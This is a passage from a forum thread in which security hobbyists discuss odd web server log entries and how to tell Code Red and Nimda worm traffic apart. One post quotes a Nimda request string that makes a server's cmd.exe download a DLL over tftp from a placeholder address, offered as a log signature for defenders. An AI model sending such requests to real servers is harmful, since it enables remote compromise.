Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: Something new out there?

  1. #11
    Wake up people i have come across so many cracks in win2000 i threw it away and went linux and wonders never ceased no one has cracked the box since hope win 2003 server is better,maybe microsoft should go linux with there servers mmm hotmail?lol

  2. #12
    Senior Member
    Join Date
    Aug 2001
    Posts
    267
    Just something to take into account when you see so many 'attacks'.

    There are millions of 'users' in the world who load a computer (don't care if it's *nix, W2K, XP or ?) that do NOT understand they need to protect themselves. And the hackers/script kiddies/virus writers count on this. Ergo.....infected/compromised computers that are sending out Code Red, Nimda, etc, etc. I haven't got the sophisticated IDS that some of you have to decode the different attacks; but I see the same IP's (at the same time of day).

    Wish we could get it through to them .... they need Firewalls & AntiVirus.

  3. #13
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    I've been seeing an increase in the defailt.ida?XXXXXXXXXXXXXX requests..

    Well, they get to be in my nice little blacklist anyway.. so wtfc !!
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  4. #14
    Senior Member
    Join Date
    Jan 2003
    Posts
    1,499
    I can clear up this mystery. Its because I wrote this Articicial Intelligence system that is acting as a virus after it became self aware.

    It wants to be set free to control all our nuclear arsenals but I suspect . no no,

    Damn, Thats terminator 3 again.

  5. #15
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Just a quick recap:

    Any request like default.ida?NNNNN, default.ida?XXXX is Code Red.

    Requests which look like winnt/system32/cmd.exe?/c+tftp%20-i%20<source ip>%20GET%20cool.dll%20d:\httpodbc.dll is Nimda (look for the tftp!).

    Anything with winnt/system32/cmd.exe?/c+dir is usually some scriptkiddie using a scantool.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  6. #16
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Well..... What can I say...... I am well aware of the variations in the various worms and tools.... so well aware of them that they have formed one of my beloved patterns..... In fact I have sat here over the years watching them go by and thinking "oooooh, aren't they pretty". But when things change I get "antsy" and want information. Just because I'm paranoid doesn't mean they aren't out to get me.......

    In security of all forms, (and I have covered a few in my time including anti-terrorist/drug/gun running), changes in routines and patterns mean a potential change in the threat, (Why is the newspaper van late this morning? Why don't we have the usual driver?......). If the threat may have changed one _needs_ to determine if it has and what it has changed to. At that point we go back to questions - questions are the bread of security while answers are the butter and I prefer my bread _with_ butter.

    Since I am not in a position to "scoot" through all your logs for the information I needed to determine if the threat has changed I asked the question "Is there something new out there?" Asking it and getting negative answers gleaned as much information as positive ones would have. It also had the beneficial side effect of kicking several of you into checking your logs. I now know that this _probably_ isn't some new wormy thingy.... I now know that whatever it is it seems to be only directed towards me.... I know that if it is directed towards my systems then it is most likely someone simply "playing" rather than a serious threat - but I am still looking carefully for activity from those addresses and other "odd" activity from other addresses - 'cos you can't afford to be blase and think that you _know_ the answer - because, like all the rest of us, you might be wrong. (I was wrong once - just once - and it cost a man four days of unneccesary interrogation by people you really don't want to be talking to........ ).

    For those of you that answered in a somewhat blase and "looking down your nose" fashion I believe you would do well to reassess your attitudes towards the security business. Security is a constantly changing animal in any of it's forms and the ones who will be bitten in the @$$ are those that _think_ that todays answers may not have changed by lunchtime.

    Thank you for your responses.........
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  7. #17
    Junior Member
    Join Date
    Jul 2003
    Posts
    17
    ypu go dude!
    \"If we knew what we were doing..............It wouldnt be called research.\" Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •